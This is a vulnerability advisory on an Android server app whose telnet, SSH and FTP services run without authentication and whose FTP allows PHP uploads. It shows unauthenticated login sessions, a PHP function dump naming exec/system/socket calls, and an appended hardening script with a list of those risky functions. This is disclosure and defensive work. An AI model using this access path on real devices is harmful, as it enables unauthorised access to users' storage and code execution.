Ice Cold Apps Servers Ultimate 6.0.2(12) Remote Command Execution
Source: @_larry0  Author: Cashdollar  Published: 2013-10-08
Multiple vulnerabilities in Ice Cold Apps Servers Ultimate Version 6.0.2(12) for Android

9/8/13
Larry W. Cashdollar, @_larry0

http://www.amazon.com/Ice-Cold-Apps-Servers-Ultimate/dp/B00E00C44G/ref=sr_1_1?s=mobile-apps&ie=UTF8&qid=1378688647

http://www.icecoldapps.com

Vulnerabilities

There are no credentials by default: authentication is disabled for the telnet, SSH and FTP servers, which allows remote access to the device's storage. PHP files can be uploaded to the web server's document directory and executed.

	• FTP server allows writes to the lighttp/php* directory.
	• Telnet server: authentication turned off by default.
	• SSH server: authentication turned off by default.
	• Anonymous SOCKS proxy and HTTP/FTP proxy.
SSHD

larry$ ssh 192.168.0.29 -p 2222
$ id
uid=10041(app_41) gid=10041(app_41) groups=1015(sdcard_rw),3003(inet)
$ uptime
up time: 19:42:02, idle time: 18:47:19, sleep time: 00:00:00
$

Telnet

larry$ telnet 192.168.0.29 2323
Trying 192.168.0.29...
Connected to 192.168.0.29.
Escape character is '^]'.

Welcome to tel!
Please enter some text to test the connection and hit enter:

$
$ id
uid=10041(app_41) gid=10041(app_41) groups=1015(sdcard_rw),3003(inet)
$

lighttpd / PHP server

	• PHP exposes the full set of built-in functions, as listed with:

<?php
    // Dump every function the interpreter makes available to uploaded scripts
    $arr = get_defined_functions();
    echo "<pre>";
    print_r($arr);
    echo "</pre>";
?>

This returned 1300 functions, including exec(), passthru(), system() and the socket family:

            [662] => socket_select
            [663] => socket_create
            [664] => socket_create_listen
            [665] => socket_create_pair
            [666] => socket_accept
            [667] => socket_set_nonblock
            [668] => socket_set_block
            [669] => socket_listen
            [670] => socket_close
            [671] => socket_write
            [672] => socket_read
            [673] => socket_getsockname
            [674] => socket_getpeername
            [675] => socket_connect
            [676] => socket_strerror
            [677] => socket_bind
            [678] => socket_recv
            [679] => socket_send
            [680] => socket_recvfrom
            [681] => socket_sendto
            [682] => socket_get_option
            [683] => socket_set_option
            [684] => socket_shutdown
            [685] => socket_last_error
            [686] => socket_clear_error
            [687] => socket_import_stream
            [688] => socket_getopt
            [689] => socket_setopt
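As an added hardening check, not part of the original advisory, the following PHP script reports which of the command-execution and socket functions named above remain callable on a given lighttpd/PHP install and prints the php.ini disable_functions line that would block them. The function list $risky is an assumed selection, not the app's own configuration.

```php
<?php
// Added audit script (not from the advisory). Drop it in the lighttpd docroot
// or run it with the php CLI, then set disable_functions in php.ini.

// Command-execution and raw-socket functions an uploaded PHP file could use;
// the socket_* entries mirror the advisory's get_defined_functions() output.
$risky = array(
    'exec', 'passthru', 'system', 'shell_exec', 'proc_open', 'popen',
    'socket_create', 'socket_connect', 'socket_bind', 'socket_listen',
    'socket_accept', 'socket_send', 'socket_recv', 'socket_sendto',
);

function audit_risky_functions(array $names)
{
    // disable_functions is a comma-separated list; normalise it for lookup.
    $disabled = array_filter(array_map('trim',
        explode(',', (string) ini_get('disable_functions'))));
    $report = array('callable' => array(), 'disabled' => array(), 'absent' => array());
    foreach ($names as $fn) {
        if (in_array($fn, $disabled, true)) {
            $report['disabled'][] = $fn;   // blocked by php.ini
        } elseif (function_exists($fn)) {
            $report['callable'][] = $fn;   // reachable from uploaded code
        } else {
            $report['absent'][] = $fn;     // not compiled into this build
        }
    }
    return $report;
}

$report = audit_risky_functions($risky);
foreach ($report as $state => $fns) {
    printf("%-9s %s\n", $state . ':', $fns ? implode(', ', $fns) : '(none)');
}

// disable_functions is PHP_INI_SYSTEM, so it cannot be changed from a script;
// print the line to add to php.ini, then restart lighttpd/php-cgi.
if ($report['callable']) {
    echo "\nAdd to php.ini:\ndisable_functions = " . implode(',', $risky) . "\n";
}
```

On the vulnerable install described above, every listed function is expected to land in the "callable" group; the FTP write access to the PHP directory is the other half of the exposure and needs to be closed separately.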
Vendor Notified: 9/10/2013

The full list is here:

http://vapid.dhs.org/advisories/ultimate-server-android-vulns.html

-- Larry